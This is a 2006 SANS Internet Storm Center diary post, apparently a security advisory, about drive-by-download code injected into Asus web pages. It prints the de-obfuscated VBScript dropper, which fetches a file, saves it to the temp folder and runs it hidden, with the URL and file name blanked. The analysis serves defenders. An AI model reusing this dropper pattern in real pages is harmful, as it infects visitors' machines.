Threat Level: green Handler on Duty: Johannes Ullrich

SANS ISC: Virus spreads from Asus Server SANS ISC InfoSec Forums

Participate: Learn more about our honeypot network

Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!
Virus spreads from Asus Server
Robert has shared with us on a report that indicates drive-by-downloads injected in Asus pages:

This is definitely not the first such cases. Websites that are not secure are favourite sources for attackers to use them as a platform to launch attack.

Our Handler, Lenny. has de-obfuscated version of the VBScript that triggered the download:

 <script language="VBScript">
   on error resume next
   clID1  = "clsi"
   clID2  = "d:BD96C556-65A3-11D0-983A-00C04FC29E36"
   XML1 = "Mic"
   XML2 = "rosoft.XMLHTTP"
   AdoSqa1 = "Adodb.S"
   AdoSqa2 = "tream"
   oGet   = "GET"
   fname1 = ""
   SFO    = "Scripting.FileSystemObject"
   SApp   = "Shell.Application"
   dl     = ""
   Set df = document.createElement("object")
   df.setAttribute "classid", clID1&clID2
   Set x  =  df.CreateObject(XML1&XML2,"")
   set S  =  df.createobject(AdoSqa1&AdoSqa2,"")
   S.type = 1
   x.Open oGet, dl, False
   set F   = df.createobject(SFO,"")
   set tmp = F.GetSpecialFolder(2)
   fname1  = F.BuildPath(tmp,fname1)
   S.write x.responseBody
   S.savetofile fname1,2
   set Q  = df.createobject(SApp,"")
   Q.ShellExecute fname1,"","","open",0
   <title>Internet Explorer</title>

Koon Yaw

68 Posts
Dec 16th 2006

Sign Up for Free or Log In to start participating in the conversation!